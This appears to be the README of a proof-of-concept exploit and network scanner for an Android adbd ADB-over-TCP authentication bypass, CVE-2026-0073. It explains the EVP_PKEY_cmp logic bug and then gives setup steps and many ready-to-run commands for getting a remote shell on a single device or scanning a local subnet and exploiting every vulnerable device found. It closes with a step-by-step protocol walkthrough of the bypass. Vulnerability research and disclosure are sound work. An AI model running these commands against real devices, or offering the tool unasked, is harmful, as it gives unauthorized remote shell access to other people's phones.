
A PoC tool for the CVE-2026-0073 on android 11+ devices which allows instant zero click RCE on any unpatched device with adb over tcp enabled
A proof-of-concept exploit and network scanner for CVE-2026-0073, a critical
zero-click, no-interaction remote code execution vulnerability in Android adbd's
ADB-over-TCP authentication path.
The vulnerability is a logic bug in adbd_tls_verify_cert() (daemon/auth.cpp)
where EVP_PKEY_cmp() is treated as a boolean predicate. When a stored RSA key
is compared against a non-RSA TLS client certificate (EC P-256 or Ed25519), the
API returns -1 (type mismatch), which is truthy in C/C++. This promotes a
cross-algorithm mismatch into a successful host-key match — bypassing
authentication entirely.
Technical details obtained from BARGHEST.
Base PoC code sourced from SecTestAnnaQuinn.
Patched in Android Security Bulletin — May 2026.
| Attribute | Detail |
|---|---|
| Attack vector | Network (adjacent / proximal) |
| Interaction | None (zero-click) |
| Privilege obtained | shell user (uid=2000), SELinux u:r:shell:s0 |
| Exploit primitive | Remote shell access via ADB |
| CVSS | Critical (9.8) |
From the shell context an attacker can inspect system properties, process
state, logs, notifications; install and remove packages; use run-as against
debuggable applications; and stage follow-on exploitation.
| File | Purpose |
|---|---|
adb_tls_auth_bypass.py | Single-target exploit PoC (original by SecTestAnnaQuinn, checksum-patched) |
adbt_scanner.py | Network scanner — discover vulnerable devices + exploit them |
requirements.txt | Python dependencies |
For the exploit to succeed, the target Android device must have:
adbd TCP service)/data/misc/adb/adb_keys# Create virtual environment
uv venv
# Activate it
source .venv/bin/activate
# Install dependencies
uv pip install -r requirements.txt
Dependencies:
| Package | Used by | Required? |
|---|---|---|
cryptography | Both scripts (EC cert generation, TLS) | Yes |
netifaces | Scanner (subnet detection) | Preferred |
zeroconf | Scanner (mDNS discovery) | Preferred |
scapy | Scanner (ARP sweep) | Preferred |
The scanner degrades gracefully when optional packages are missing — it will
warn and fall back to alternative methods (system ip command, nmap, TCP
connect scan).
Attack a known vulnerable device directly.
python3 adb_tls_auth_bypass.py 192.168.1.42 # interactive shell
python3 adb_tls_auth_bypass.py 192.168.1.42 5555 --cmd "id"
Or via the scanner:
python3 adbt_scanner.py --host 192.168.1.42 # interactive shell
python3 adbt_scanner.py --host 192.168.1.42 --cmd "id; getprop ro.product.model"
python3 adbt_scanner.py --host 192.168.1.42 --port 5580 --cmd "whoami"
Scan the local network for vulnerable devices and exploit all confirmed targets.
# Full scan: mDNS → ARP → port scan → ADB probe → exploit
python3 adbt_scanner.py --scan
# Run a specific command on all vulnerable devices
python3 adbt_scanner.py --scan --cmd "id; getprop ro.build.version.security_patch"
# Recon only — discover but don't exploit
python3 adbt_scanner.py --scan --no-exploit
# Scan multiple ports
python3 adbt_scanner.py --scan --ports 5555,5580,5037
# Override detected subnet (multi-homed hosts, specific ranges)
python3 adbt_scanner.py --scan --subnet 192.168.2.0/24
# Tune timeouts for slow networks
python3 adbt_scanner.py --scan --connect-timeout 5 --probe-timeout 10
# Extend mDNS listen window
python3 adbt_scanner.py --scan --mdns-timeout 60
# Skip specific discovery phases
python3 adbt_scanner.py --scan --no-mdns # skip mDNS, ARP only
python3 adbt_scanner.py --scan --no-arp # skip ARP, mDNS only
--scan Scan network for vulnerable devices + exploit
--host HOST Direct single-target exploit
--port PORT ADB port for --host mode (default: 5555)
--cmd COMMAND Shell command to run
-v, --verbose Verbose logging
--mdns-timeout SECONDS mDNS listen duration (default: 30)
--ports PORTS Comma-separated ports in --scan mode (default: 5555)
--subnet CIDR Override detected subnet (e.g. 192.168.2.0/24)
--connect-timeout SECONDS TCP connect timeout (default: 2.0)
--probe-timeout SECONDS ADB probe timeout (default: 3.0)
--arp-timeout SECONDS ARP sweep timeout (default: 3)
--no-mdns Skip mDNS discovery
--no-arp Skip ARP sweep + port scan
--no-exploit Stop after ADB protocol probe phase
┌─────────────────────────────────────────────────────────────┐
│ 1. Subnet detection — netifaces → ip route → socket trick │
│ 2. mDNS listener — _adb-tls-connect._tcp (30s default) │
│ 3. ARP sweep — scapy.arping → nmap -sn │
│ 4. Port scan — TCP connect to each host:port │
│ 5. ADB protocol probe — send CNXN, classify response │
│ │
│ STLS → VULNERABLE (proceed to exploit) │
│ AUTH → legacy ADB auth (not this CVE) │
│ CNXN → open, no auth (already accessible) │
│ NO_ADB → not an ADB service │
│ │
│ 6. Exploitation — TLS upgrade → auth bypass → shell │
└─────────────────────────────────────────────────────────────┘
mDNS is the most accurate identification method: when wireless debugging is
paired, Android broadcasts _adb-tls-connect._tcp explicitly. ARP sweep +
port scan serves as a catch-all fallback.
Phase 1 — cleartext ADB
Client → CNXN(payload="host::features=...")
Device → STLS (upgrade to TLS required)
Phase 2 — TLS 1.3 with cross-algorithm client cert
Client → STLS reply
Client → TLS 1.3 handshake + EC P-256 client certificate
Device calls adbd_tls_verify_cert():
known_evp = RSA key from /data/misc/adb/adb_keys
evp_pkey = EC P-256 key from client certificate
EVP_PKEY_cmp(known_evp, evp_pkey) → -1 (type mismatch)
if (-1) → verified = true ← BUG: -1 is truthy
Phase 3 — Post-TLS ADB service layer
Client drains device CNXN (transport already online)
No host CNXN sent (would trigger handle_new_connection kick)
Client → OPEN(local_id, window=32MB, payload="shell:\x00")
Device → OKAY → shell stream established